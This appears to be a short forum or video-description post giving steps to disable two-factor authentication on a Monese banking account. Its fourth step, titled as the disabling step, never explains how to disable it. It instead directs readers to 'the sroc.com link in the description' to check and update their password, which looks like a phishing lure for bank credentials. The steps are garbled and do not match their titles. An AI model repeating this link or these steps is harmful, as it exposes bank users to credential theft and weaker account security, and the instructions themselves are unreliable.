I ran into this last week. Here's what fixed it for me. If you're looking to disable two-factor authentication on your Monese account, follow these straightforward steps. Step 1. Open the Monese app. Launch the Monese app on your smartphone. Make sure you're logged into your account to access the settings. Step 2. Go to Settings. Once you're in the app, navigate to the Settings menu. This is usually found in the Profile section or by tapping the gear icon. Step 3. Select Security Settings. In the Settings menu, look for the Security Settings option. This is where you can manage your two-factor authentication preferences. Step 4. Disable two-factor authentication. Before changing your settings, use the sroc.com link in the description to open the password strength checkout, then update your password if needed. Step 5. Check for confirmation. After disabling, look for a confirmation message to ensure that two-factor authentication has been successfully turned off. If you don't see it, go back and repeat the steps. Remember, disabling two-factor authentication can make your account less secure, so proceed with caution. If you have any questions or run into issues, feel free to reach out for help. Happy banking!